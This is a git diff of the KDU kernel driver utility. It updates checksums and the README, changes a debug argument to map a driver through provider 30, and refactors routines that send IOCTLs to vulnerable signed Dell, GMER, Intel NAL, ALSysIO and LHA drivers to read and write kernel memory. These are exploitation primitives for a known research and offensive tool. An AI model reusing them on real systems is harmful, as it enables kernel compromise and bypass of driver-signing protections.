diff --git a/KDU.sha256 b/KDU.sha256
index 6411b51..f26f2bc 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -35,7 +35,7 @@ ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaz
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
a29f7dd29a464e1e044afd94791a5d51c7f69ba7c30af0bf7973178e013d1028 *Source\Hamakaze\KDU.vcxproj
55f3a6393ae677fc99380250728e5f068a98eeccea68a68610482056a5f3fbb2 *Source\Hamakaze\KDU.vcxproj.filters
-4b4891c7915e25ca6f58cb0d5a6b2e8c73484c73921d4ef699abbb7bd98494ec *Source\Hamakaze\KDU.vcxproj.user
+2b23e54f534686163cb13717df7ab939c5adfb21d15d791298d36a72cbc5c11d *Source\Hamakaze\KDU.vcxproj.user
a76a917502286d6a7fc36127d1f880b7facb8d882c3defcb758162c223093a37 *Source\Hamakaze\kduplist.h
0d45b44d55d3986f8dfca4528c54597cfbc7b120166d9f3d526a22b530ff4480 *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
@@ -46,13 +46,13 @@ eaeb06030f296d1147869dc65254a990425033b64e654f5d0e1c1408eebc2d93 *Source\Hamakaz
eb15810b52b16482f3a3a679fbeed102257bfa0416243e74fce5b634daf9b074 *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
f02b459bbc24380e6d2e2d80dfd0372a706f9c8c2f75df939ffbd5f7d6826dda *Source\Hamakaze\resource.rc
-a96ea46fac8d9c25c370aebd19a262c3277fc4bdf81043c043078f012971a7dd *Source\Hamakaze\shellcode.cpp
+a6f3ec0bc0beb0ef152a2a33ca5cbd27bf538316ddf90545b31cd5a78114d6ec *Source\Hamakaze\shellcode.cpp
87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
1bc7b331c4d2be8d2b7686fee741954aa7c44f9b63f2001d451bb9d4ac6c2b61 *Source\Hamakaze\shellstager.lst
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
-fb13502ed0db29b9241a6b717cdfd95cfcf0521266bea2ec26a6eb743eb524a9 *Source\Hamakaze\sup.cpp
-60396a1465a67894d1020e7558d1c553c5331e457ec1e5d0cb1015ef551d85fe *Source\Hamakaze\sup.h
+a6160dbf3dd84af0331f665dfd1ec81dac0ce2ba54fe2911d98bd678f6c33377 *Source\Hamakaze\sup.cpp
+58a79fa6ab7e4787e0fc58176d8ec0305552223305945de454992741a6bdde11 *Source\Hamakaze\sup.h
d19e67019fc5666a80a153991ec3d2ac3a7e8dbe088dd9ff93d3e0d0ced91cde *Source\Hamakaze\sym.cpp
292efaabf3f6223761aef1fc418ec98108fb529c7260d9d4a72715378c6b7547 *Source\Hamakaze\sym.h
feeeb953ad589ad1d056b406848f810fe8ac069ed232b9d91a946b1a9dc2ff7e *Source\Hamakaze\tests.cpp
@@ -64,7 +64,7 @@ ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaz
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
9d37519623d404987300d3f3258148ba9adddfe1bed5f89a0e9e47646819c9c7 *Source\Hamakaze\hde\pstdint.h
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
-76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp
+e2a05d3c5c316ce6ad5fb8439508803a23f2c1cf5c5b7835a4276b5795cf0ef4 *Source\Hamakaze\idrv\alcpu.cpp
98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h
de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
@@ -72,11 +72,11 @@ b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaz
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
498cbec6087b80ff01a3600221b27edd69db7debd6b6194a876a84af2ef5bee1 *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
-92d715b1e03c9f7c14aaac7ed3cc565c4dba2586134aa32eb080284fce36ddbf *Source\Hamakaze\idrv\dell.cpp
+8c61e22c624b7fce32fdb1c7fd3075c9d9ac5eb4f0ad3370f575f5af47a4d7c7 *Source\Hamakaze\idrv\dell.cpp
1d864cc688e8a2c38da6b94019f7efba771a0e0b7f68e1c3f8700b8caa76dda0 *Source\Hamakaze\idrv\dell.h
791a4d40f3f5076d0e6ed47e7db972f448ccc78ca578c35f11db637962c868a5 *Source\Hamakaze\idrv\directio64.cpp
73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h
-65c53a700fff2f766420a7e0612446aed7ef8f04fd44162ff73c0ba7e3581d77 *Source\Hamakaze\idrv\gmer.cpp
+e8d7c1c93512be4dd846d6c401c8135ae291354db99c926942176017db56bc91 *Source\Hamakaze\idrv\gmer.cpp
89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h
865bba446ad9f202f2bea58aec4cf48fa87448105dee2fb69caab37ec54f66e8 *Source\Hamakaze\idrv\hilscher.cpp
db94f36f0d3b946500352ab07393994f0a09e2737a63e1cdbedd3da16c72cb2d *Source\Hamakaze\idrv\hilscher.h
@@ -85,7 +85,7 @@ ae9dd179c7fdc2b1a4741399e64fa9d4a13d22b7fad45cedea9ce285fe7399ea *Source\Hamakaz
f3c889ede5142f88b54d3e5e973b46f0fb897d306695de82df9c683f72774fb8 *Source\Hamakaze\idrv\ldrsc.h
513a4821cd2ed1f2e8a1cf5566f46c82000baaa01fe08b3d8b3707442a3776c9 *Source\Hamakaze\idrv\lenovo.cpp
bde727787cee5122c4e2db9f9f8e67afda8d7ae3debea07516f92a792a103d48 *Source\Hamakaze\idrv\lenovo.h
-8bcc062ab27f293c35df032340e761f18013d978fd3df33fbaca3a30a2726b5f *Source\Hamakaze\idrv\lha.cpp
+895f9fbf94dad737f812de5be1fb0ab600f72d2c4b7b3d784bb14caaf62b7abc *Source\Hamakaze\idrv\lha.cpp
dcb5da7acb4997abbde8372a8daf74dae5727ca5cbf80b26876fdb4cb2a0bc08 *Source\Hamakaze\idrv\lha.h
cd54a9949aab0c5552c0defaef6b1a007e259b0b3e5ab8a3683ef0baa951a331 *Source\Hamakaze\idrv\mapmem.cpp
a03968ba9941a3ebb40de2a7e3f0f90aac6e0f750e72231a3570b6fe28c614a8 *Source\Hamakaze\idrv\mapmem.h
@@ -93,7 +93,7 @@ aa367663a843d7ca621a68a0490877b418a8b31afa11ad691e1f1af294c199dc *Source\Hamakaz
27c23f2e7eb5a6efceba108c2551c692f6317d03bff5563bb38d117d6699eeb4 *Source\Hamakaze\idrv\marvinhw.h
d281289e0cda5f4171e999bb1313aa235c54583aa8b0df3aa187af35b4ba2057 *Source\Hamakaze\idrv\mimidrv.cpp
395143a2f6451bc4f62a5a8f362e579e35bdc6de8f3fc4c6ab5f8bce946cd467 *Source\Hamakaze\idrv\mimidrv.h
-ce53137a648e55c800e6641b9cb3bf9c148598bbb47972b947f4e4620ae61c9d *Source\Hamakaze\idrv\nal.cpp
+2732060e740928d5976dc7ead49d9bf17be7fd09b98b303b2e328c9ce39a2480 *Source\Hamakaze\idrv\nal.cpp
5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h
f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp
399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h
@@ -101,13 +101,13 @@ f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaz
8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h
bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp
08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h
-7e3b832db9b2d83d706b854e30a5fc2619905f4e2187b948864bad75da55e92a *Source\Hamakaze\idrv\ryzen.cpp
+8fca55a7ff95a1c230fec101938551ea6912a14345b6d39c849e5dcf9b6577eb *Source\Hamakaze\idrv\ryzen.cpp
653d97baf28622ea8ffa0fdc99c201343213ab0a7318caef012a8967cc51660c *Source\Hamakaze\idrv\ryzen.h
a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaze\idrv\rzpnk.cpp
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
-f5f39190e7aac79f20caa4d99f8e4db83e67441db83422c9c08749d46a38db8e *Source\Hamakaze\idrv\winio.cpp
+35d01bbb1a19f50b23a201aef04c1ee718a137a5d9330b126645703bdd2d1514 *Source\Hamakaze\idrv\winio.cpp
d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h
-21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp
+b3a7fc6cc6a5b33a71a7f043c9a649238de2f7755075a6f5c91c2a544c81f0d8 *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
285c2c1c44e863142bd5d0606a2bc940fb0e444aa825a675d472860a0499d5e4 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
@@ -140,8 +140,8 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\minirtl\_strncpy.c
8acab5c8b8b339bdaf8e7b7d06f2cd6b10d24f889ef92462e4e53abbc5dc5341 *Source\Shared\ntos\halamd64.h
ffac2569a1dd61c400cda45839c7314bdd99cfcb5c17d503807db34c168628d2 *Source\Shared\ntos\ntalpc.h
-3e7447b7e1947ce73e6f1b98c3b9f15905e1a8306ff238197683a1372d91ba48 *Source\Shared\ntos\ntbuilds.h
-7ffb25f7978b4a6caa874dfb406607320de94f43285b5a4e882c3676f0d6b795 *Source\Shared\ntos\ntos.h
+edfa8fc4ae20deaa0f7843c15b51a80e5139d661f8c385f2b6d05863cd15c3bc *Source\Shared\ntos\ntbuilds.h
+f6da2ee9a7ec2afa9bb10f22cecf315074a35d3191ec37e6043898d660d49211 *Source\Shared\ntos\ntos.h
978fc994fddd0302d469df4daefc5ff398a97da62bfabdafe50817916a97361a *Source\Shared\ntos\ntsup.c
572e137cf67f3bf6b5f2fefb4db04c713bd7e8d295d45abacddb5c920a1a0bce *Source\Shared\ntos\ntsup.h
261011d0ee9c2d2ee22dad2cdb45d66449b22b5a831fd60293f315c72968dd32 *Source\Shared\tinyaes\aes.c
diff --git a/README.md b/README.md
index 09cefcc..13b7611 100644
--- a/README.md
+++ b/README.md
@@ -201,6 +201,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* KDU v1.2 release and the wonderful world of Microsoft incoherency, https://swapcontext.blogspot.com/2022/02/kdu-v12-release-and-wonderful-world-of.html
* How to exploit a vulnerable windows driver, https://github.com/stong/CVE-2020-15368
* CVE-2022-3699, https://github.com/alfarom256/CVE-2022-3699
+* LOLDrivers, https://www.loldrivers.io
# Wormhole drivers code
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index efe5879..537c2c0 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -5,7 +5,7 @@
WindowsLocalDebugger
- -test
+ -prv 30 -map c:\install\dummy.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/idrv/alcpu.cpp b/Source/Hamakaze/idrv/alcpu.cpp
index 8d84dad..56ca038 100644
--- a/Source/Hamakaze/idrv/alcpu.cpp
+++ b/Source/Hamakaze/idrv/alcpu.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ALSYSIO64.CPP
*
-* VERSION: 1.28
+* VERSION: 1.31
*
-* DATE: 01 Dec 2022
+* DATE: 14 Apr 2023
*
* ALSYSIO64 driver routines.
*
@@ -70,29 +70,24 @@ BOOL WINAPI AlcWritePhysicalMemory(
value = FIELD_OFFSET(ALCPU_WRITE_REQUEST, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (ALCPU_WRITE_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (ALCPU_WRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
-
- bResult = supCallDriver(DeviceHandle,
- IOCTL_ALCPU_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
-
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ALCPU_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/dell.cpp b/Source/Hamakaze/idrv/dell.cpp
index f94d3cf..ed3a9fc 100644
--- a/Source/Hamakaze/idrv/dell.cpp
+++ b/Source/Hamakaze/idrv/dell.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 24 Mar 2023
+* DATE: 14 Apr 2023
*
* Dell drivers routines.
*
@@ -132,35 +132,30 @@ BOOL WINAPI DbUtilReadVirtualMemory(
size = (SIZE_T)FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
- pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ pRequest = (DBUTIL_READWRITE_REQUEST*)supAllocateLockedMemory(size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
- pRequest->Unused = 0xDEADBEEF;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->Offset = 0;
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL_READVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_DBUTIL_READVM,
- pRequest,
- (ULONG)size,
- pRequest,
- (ULONG)size);
-
- if (!bResult) {
- dwError = GetLastError();
- }
- else {
- RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes);
- }
-
- VirtualUnlock(pRequest, size);
+ if (!bResult) {
+ dwError = GetLastError();
+ }
+ else {
+ RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes);
}
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
@@ -191,32 +186,27 @@ BOOL WINAPI DbUtilWriteVirtualMemory(
size = (SIZE_T)FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
- pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ pRequest = (DBUTIL_READWRITE_REQUEST*)supAllocateLockedMemory(size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Unused = 0xDEADBEEF;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->Offset = 0;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_DBUTIL_WRITEVM,
- pRequest,
- (ULONG)size,
- pRequest,
- (ULONG)size);
-
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
+ if (!bResult)
+ dwError = GetLastError();
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
@@ -244,36 +234,33 @@ BOOL WINAPI DpdReadPhysicalMemory(
SIZE_T size;
size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
- pvBuffer = (PVOID)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ pvBuffer = (PVOID)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pvBuffer) {
- if (VirtualLock(pvBuffer, size)) {
+ request.PhysicalAddress.QuadPart = PhysicalAddress;
+ request.Size = NumberOfBytes;
+ request.Granularity = 0; //use direct memmove
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_PCDCSRVC_READPHYSMEM,
+ &request,
+ sizeof(PCDCSRVC_READWRITE_REQUEST),
+ pvBuffer,
+ NumberOfBytes);
- request.PhysicalAddress.QuadPart = PhysicalAddress;
- request.Size = NumberOfBytes;
- request.Granularity = 0; //use direct memmove
+ if (bResult) {
- bResult = supCallDriver(DeviceHandle,
- IOCTL_PCDCSRVC_READPHYSMEM,
- &request,
- sizeof(PCDCSRVC_READWRITE_REQUEST),
+ RtlCopyMemory(Buffer,
pvBuffer,
NumberOfBytes);
- if (bResult) {
-
- RtlCopyMemory(Buffer,
- pvBuffer,
- NumberOfBytes);
-
- }
-
- VirtualUnlock(pvBuffer, size);
}
- VirtualFree(pvBuffer, 0, MEM_RELEASE);
-
+ supFreeLockedMemory(pvBuffer, size);
}
return bResult;
@@ -298,36 +285,33 @@ BOOL WINAPI DpdWritePhysicalMemory(
SIZE_T size;
size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
- pRequest = (PCDCSRVC_READWRITE_REQUEST*)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
- if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Granularity = 0; //use direct memmove
- pRequest->Size = NumberOfBytes;
-
- //
- // Append data buffer to the tail.
- //
- RtlCopyMemory(
- RtlOffsetToPointer(pRequest, sizeof(PCDCSRVC_READWRITE_REQUEST)),
- Buffer,
- NumberOfBytes);
+ pRequest = (PCDCSRVC_READWRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_PCDCSRVC_WRITEPHYSMEM,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
+ if (pRequest) {
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Granularity = 0; //use direct memmove
+ pRequest->Size = NumberOfBytes;
+ //
+ // Append data buffer to the tail.
+ //
+ RtlCopyMemory(
+ RtlOffsetToPointer(pRequest, sizeof(PCDCSRVC_READWRITE_REQUEST)),
+ Buffer,
+ NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_PCDCSRVC_WRITEPHYSMEM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/gmer.cpp b/Source/Hamakaze/idrv/gmer.cpp
index 8c5ae21..bba6872 100644
--- a/Source/Hamakaze/idrv/gmer.cpp
+++ b/Source/Hamakaze/idrv/gmer.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: GMER.CPP
*
-* VERSION: 1.20
+* VERSION: 1.31
*
-* DATE: 08 Feb 2022
+* DATE: 14 Apr 2023
*
* GMER driver routines.
*
@@ -99,32 +99,28 @@ BOOL WINAPI GmerWriteVirtualMemory(
value = FIELD_OFFSET(GMER_WRITE_REQUEST, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (GMER_WRITE_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (GMER_WRITE_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Unused = 0;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->DataSize = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Unused = 0;
- pRequest->VirtualAddress = VirtualAddress;
- pRequest->DataSize = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_GMER_WRITEVM,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
+ if (!bResult)
+ dwError = GetLastError();
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
-
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
diff --git a/Source/Hamakaze/idrv/lha.cpp b/Source/Hamakaze/idrv/lha.cpp
index 9ed60a6..ed70469 100644
--- a/Source/Hamakaze/idrv/lha.cpp
+++ b/Source/Hamakaze/idrv/lha.cpp
@@ -77,33 +77,27 @@ BOOL WINAPI LHAWritePhysicalMemory(
value = FIELD_OFFSET(LHA_WRITE_PHYSICAL_MEMORY, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (LHA_WRITE_PHYSICAL_MEMORY*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (LHA_WRITE_PHYSICAL_MEMORY*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->Address = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- pRequest->Address = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_LHA_WRITE_PHYSICAL_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_LHA_WRITE_PHYSICAL_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- if (!bResult)
- dwError = GetLastError();
-
- VirtualUnlock(pRequest, size);
- }
- else {
+ if (!bResult)
dwError = GetLastError();
- }
- VirtualFree(pRequest, 0, MEM_RELEASE);
+
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
diff --git a/Source/Hamakaze/idrv/nal.cpp b/Source/Hamakaze/idrv/nal.cpp
index 2224eef..54ae70f 100644
--- a/Source/Hamakaze/idrv/nal.cpp
+++ b/Source/Hamakaze/idrv/nal.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: NAL.CPP
*
-* VERSION: 1.10
+* VERSION: 1.31
*
-* DATE: 15 Apr 2021
+* DATE: 14 Apr 2023
*
* Intel Network Adapter iQVM64 driver routines.
*
@@ -184,36 +184,32 @@ BOOL NalReadVirtualMemory(
DWORD dwError = ERROR_SUCCESS;
NAL_MEMMOVE request;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
- if (lockedBuffer) {
-
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_READWRITE);
- RtlSecureZeroMemory(&request, sizeof(request));
- request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
- request.SourceAddress = VirtualAddress;
- request.DestinationAddress = (ULONG_PTR)lockedBuffer;
- request.Length = NumberOfBytes;
+ if (lockedBuffer) {
- bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
- if (bResult) {
- RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
- }
- else {
- dwError = GetLastError();
- }
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = VirtualAddress;
+ request.DestinationAddress = (ULONG_PTR)lockedBuffer;
+ request.Length = NumberOfBytes;
- VirtualUnlock(lockedBuffer, NumberOfBytes);
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
}
+
SetLastError(dwError);
return bResult;
}
@@ -237,31 +233,26 @@ BOOL NalWriteVirtualMemory(
DWORD dwError = ERROR_SUCCESS;
NAL_MEMMOVE request;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_READWRITE);
+
if (lockedBuffer) {
RtlCopyMemory(lockedBuffer, Buffer, NumberOfBytes);
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
-
- RtlSecureZeroMemory(&request, sizeof(request));
- request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
- request.SourceAddress = (ULONG_PTR)lockedBuffer;
- request.DestinationAddress = VirtualAddress;
- request.Length = NumberOfBytes;
-
- bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
- if (bResult == FALSE) {
- dwError = GetLastError();
- }
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = (ULONG_PTR)lockedBuffer;
+ request.DestinationAddress = VirtualAddress;
+ request.Length = NumberOfBytes;
- VirtualUnlock(lockedBuffer, NumberOfBytes);
- }
- else {
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult == FALSE) {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
@@ -330,38 +321,33 @@ BOOL WINAPI NalReadVirtualMemoryEx(
{
BOOL bResult = FALSE;
DWORD dwError = ERROR_SUCCESS;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
